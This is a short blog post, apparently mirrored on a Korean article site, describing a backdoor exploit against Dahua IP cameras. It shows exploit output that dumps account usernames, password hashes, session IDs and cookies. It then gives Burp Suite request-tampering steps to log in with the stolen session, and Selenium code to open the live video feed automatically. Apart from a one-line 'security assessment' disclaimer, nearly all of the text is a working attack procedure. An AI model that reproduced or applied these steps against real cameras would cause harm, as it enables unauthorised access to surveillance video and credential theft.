exploit - dahua camera backdoor
8269 단어 VulnerabilityAnalysisexploit
Just for security assessment. If you can exploit the dahua camera devices, username/password/cookies can be used to access camera video.
$ python exploit_dahua.py 192.168.1.103
[*] http://192.168.1.103/current_config/Account1 - 3 users
('username:', u'admin')
('password:', u'C580B3BD6C91A2349AA49B1E76DE70D3')
('session:', u'1927849572')
('session_password:', 'DBA284AF02A8108CE34F4AD38ED99B68')
('seeeion_cookie:', 'DHLangCookie30=SimpChinese;DhWebCookie=%7B%22username%22%3A%22admin%22%2C%22pswd%22%3A%22%22%2C%22talktype%22%3A1%2C%22logintype%22%3A0%7D%3B;DhWebClientSessionID=2129659796')
('username:', u'default')
('password:', u'F510910D07096DE8766775A4805FBB13')
('session:', u'826187816')
('session_password:', '9333F4C182F3F5E265ED280AA9E5DBDF')
('seeeion_cookie:', 'DHLangCookie30=SimpChinese;DhWebCookie=%7B%22username%22%3A%22default%22%2C%22pswd%22%3A%22%22%2C%22talktype%22%3A1%2C%22logintype%22%3A0%7D%3B;DhWebClientSessionID=1156207906')
How to login dahua camera with burpsuite ?
Please use the exploit.py to get username/password/sessionid/cookies , and we will use it in burpsuite.
Please access dahua default page. ex: http://192.168.1.103/.
Tamper http request with burpsuite. If you input username/password, and click the submit button. Burpsuite will receive the http request body.
POST /RPC2_Login HTTP/1.1
Host: 192.168.1.103
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.1.103/
X-Requested-With: XMLHttpRequest
X-Request: JSON
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 102
Cookie: DHLangCookie30=SimpChinese
Connection: close
{"method":"global.login","params":{"userName":"admin","password":"","clientType":"Web3.0"},"id":10000}
Send the request in burpsuite. Burpsuite will handle the second http request as follow. Please attention here, we need to replace the following parts:
POST /RPC2_Login HTTP/1.1
Host: 192.168.1.103
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.1.103/
X-Requested-With: XMLHttpRequest
X-Request: JSON
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 154
Cookie:
Connection: close
{"method":"global.login","session":,"params":{"userName":"admin","password":"","clientType":"Web3.0"},"id":10000}
and then everything goes well. We’ll see the camera monitor panel.
If you want to view the video automatically, please try yourself:
from selenium import webdriver
wdpath = "/path/to/chrome_webdriver"
chrome = webdriver.Chrome(wdpath)
chrome.add_cookie(cookies)
chrome.get('http://{}/'.format(host))
References
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
데이터 분석 학습 - Pandas를 사용한 데이터 분석데이터를 분석할 때 먼저 관련 명사가 해당 업계에서의 의미를 이해해야 한다. 즉, 관련 지식을 찾아서 제목을 전체적으로 파악해야 한다. 다음은 데이터 분석을 수행하는 단계입니다. 1. 데이터 읽기 2. 데이터에 대한...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.